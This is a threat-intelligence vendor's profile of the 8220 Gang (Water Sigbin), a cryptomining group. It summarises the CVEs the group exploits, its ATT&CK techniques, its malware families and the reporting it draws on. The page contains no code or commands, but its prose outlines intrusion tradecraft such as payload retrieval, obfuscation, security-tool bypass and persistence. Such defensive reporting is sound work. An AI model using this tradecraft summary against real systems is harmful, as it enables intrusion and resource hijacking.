Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to threat actors
Financially Motivated🇨🇳 CN9 malware familiesExploits CVEs in the wild

8220 Gang

Also known as8220_gangWater Sigbin

8220 Gang, also known as Water Sigbin, is a financially motivated, China-based threat actor/intrusion set focused primarily on deploying cryptocurrency-mining malware, especially XMRig/CoinMiner, to hijack victim resources. The group has been described as active since at least 2017 and has targeted vulnerable cloud environments, Windows and Linux web servers, VMware Horizon servers, Oracle WebLogic servers, and misconfigured containerized environments. Reported sectors and geographies include healthcare, telecommunications, financial services, Korean energy-related companies, and victims in the United States, South Africa, Spain, Colombia, Mexico, Asia, and South America. Across the provided reporting, the group is associated with opportunistic mass exploitation of public-facing applications, including Oracle WebLogic vulnerabilities CVE-2017-3506, CVE-2017-10271, CVE-2019-2725, CVE-2020-14883 (often with CVE-2020-14882), CVE-2023-21839, Atlassian Confluence vulnerabilities CVE-2021-26084 and CVE-2022-26134, and Apache Log4j/Log4Shell CVE-2021-44228 affecting VMware Horizon. The actor has also been reported exploiting WebLogic via crafted XML over HTTP requests. Observed tradecraft includes PowerShell on Windows and shell/Python scripts on Linux; use of cURL, wget, lwp-download, python urllib, and PowerShell WebClient for payload retrieval; obfuscation through base64 encoding, hexadecimal-encoded URLs, environment-variable-based batch script concealment, and HTTP over port 443; fileless execution using .NET reflection; reflective DLL injection; process hollowing; scheduled tasks, cron jobs, and systemd services for persistence; disabling or bypassing security tooling including AMSI and cloud protection tools; modifying SELinux settings and /etc/ld.so.preload; deleting logs; killing competing miners; and lateral movement via SSH brute force and SSH key abuse. Malware and tooling directly mentioned in the content include Hadooken, K4Spreader, Tsunami, ScrubCrypt, PureCrypter, AgentTesla, rhajk, nasqa, dbused, spirit, spirit-pro, hxx, px, pasx, and XMRig/CoinMiner. Tsunami is described as an IRC-controlled backdoor used for remote control, botnet activity, and DDoS capability. Sub-clusters or related naming in the content include Water Sigbin as an alias for the 8220 Gang.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Where they're from

Attributed origin per open-source reporting.

  • CN
MITRE ATT&CK

Tradecraft

19 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

9 of 15 tactics23 techniques×N= number of intelligence reports citing this technique
MITRE ATT&CK
TA0001
Initial Access
1 technique
T1190
Exploit Public-Facing Application
TA0002
Execution
2 techniques
T1059
Command and Scripting Interpreter
T1059.001×2
PowerShell
T1203
Exploitation for Client Execution
TA0003
Persistence
1 technique
T1112
Modify Registry
TA0004
Privilege Escalation
1 technique
T1055
Process Injection
T1055.002
Portable Executable Injection
TA0005
Stealth
5 techniques
T1027
Obfuscated Files or Information
T1027.010
Command Obfuscation
T1055
Process Injection
T1055.002
Portable Executable Injection
T1140
Deobfuscate/Decode Files or Information
T1564
Hide Artifacts
T1564.003
Hidden Window
T1620
Reflective Code Loading
TA0112
Defense Impairment
1 technique
T1112
Modify Registry
TA0008
Lateral Movement
1 technique
T1210
Exploitation of Remote Services
TA0011
Command and Control
3 techniques
T1071
Application Layer Protocol
T1071.001
Web Protocols
T1105×2
Ingress Tool Transfer
T1132
Data Encoding
T1132.001
Standard Encoding
TA0040
Impact
1 technique
T1496
Resource Hijacking
ARSENAL

Associated malware families

9 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen
k4spreader“…a new tool from the "8220" mining gang, which is used to install other malware, mainly to install the Tsunami DDoS botnet and the PwnRig mining program. We named it "k4spreader"…”2Mar 18, 2026
Tsunami“bi.64 -> Tsunami… Tsunami is a popular botnet that controls and communicates through the IRC protocol. Its main functions include remote control and DDoS attacks.”2Mar 18, 2026
XMRigIf the CVE-2022-26134 vulnerability attack succeeds, the following PowerShell command downloads and executes additional PowerShell scripts and ultimately installs XMRig CoinMiner.2May 25, 2026
Agent Tesla...finally deploying stealer and cryptominer malware such as AgentTesla, rhajk, nasqa.1Mar 18, 2026
Hadooken"...two new malware variants, Hadooken and K4Spreader... target vulnerable cloud environments, primarily to hijack system resources for cryptomining."1Mar 18, 2026

4 additional families tracked in Mallory.

WEAPONIZED

Associated vulnerabilities

6 CVEs this actor has used in observed campaigns. 6 of them exploited in the wild.

CVE-2017-3506Oracle WebLogic Server Web Services XMLDecoder Deserialization RCEIn the wildEvidence2

Water Sigbin exploited the vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner via a PowerShell script... We found the threat actor exploiting vulnerabilities with Oracle WebLogic server CVE-2017-3506 (a vulnerability allowing remote OS command execution)...

CVE-2021-44228Log4ShellIn the wildEvidence2

Ahnlab Security Emergency response Center (ASEC) has recently confirmed that the 8220 Gang attack group is using the Log4Shell vulnerability to install CoinMiner in VMware Horizon servers. Log4Shell (CVE-2021-44228) is both a remote code execution vulnerability and the Java-based logging utility Log4j vulnerability...

CVE-2017-10271Oracle WebLogic WLS-WSAT XML Deserialization RCEIn the wildEvidence1

In November 2017, it used the Weblogic deserialization vulnerability (CVE- 2017-10271) invading a server and implanting a mining Trojan.

CVE-2020-14882Oracle WebLogic Server Console Authentication Bypass and RCEIn the wildEvidence1

Currently, there are few samples and the following vulnerabilities are exploited. CVE_2020_14882

CVE-2022-26134Atlassian Confluence Server and Data Center OGNL Injection RCEIn the wildEvidence1

The group targets not only global systems but also Korean ones. ASEC has introduced a case where the attack group abused the Atlassian Confluence server vulnerability CVE-2022-26134 to attack Korean systems and install CoinMiner.

1 more CVE tied to this actor tracked in Mallory.

IOCS

Observables

29 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

29 IOCsView more in app

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

8 SOURCESView more in app
security online infoNews
Oct 1, 2024
Hadooken & K4Spreader Malware: 8220 Gang’s Latest Cloud Hijacking Tools

Opportunistic cloud-focused intrusion set exploiting Oracle WebLogic vulnerabilities to compromise Windows and Linux cloud servers, disable security tooling, spread laterally via SSH brute force, establish persistence (cron/systemd), and deploy Monero cryptominers; also deploys the Tsunami IRC-controlled backdoor for botnet/DDoS capability.

Read more
trend micro researchNews
Jun 28, 2024
Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer

Water Sigbin is known for exploiting Oracle WebLogic vulnerabilities to deploy cryptocurrency miners, specifically using a sophisticated multi-stage, fileless malware delivery chain that leverages reflective DLL injection, process injection, and anti-debugging techniques. The group primarily deploys the PureCrypter loader and XMRig miner, focusing on evasion and persistence.

Read more
trend micro researchNews
May 30, 2024
Decoding Water Sigbin's Latest Obfuscation Tricks | Trend Micro (US)

China-based threat actor active since at least 2017 that focuses on deploying cryptocurrency-mining malware, primarily in cloud-based environments and Linux servers, and in this campaign exploited Oracle WebLogic vulnerabilities to deliver a miner while using layered obfuscation and fileless execution techniques.

Read more
imperva blogNews
Dec 14, 2023
Imperva Detects Undocumented 8220 Gang Activities

The 8220 gang is a financially motivated threat actor known for mass deployment of cryptojacking malware targeting both Windows and Linux web servers. They exploit well-known vulnerabilities in public-facing applications to propagate malware, primarily for illicit cryptocurrency mining. Their operations are opportunistic, targeting a range of industries and geographies, and they frequently reuse infrastructure and TTPs.

Read more
+4 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping19

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal9

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs6

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables29

Domains, IPs, and hashes tied to this actor, refreshed continuously.

8220 Gang | Mallory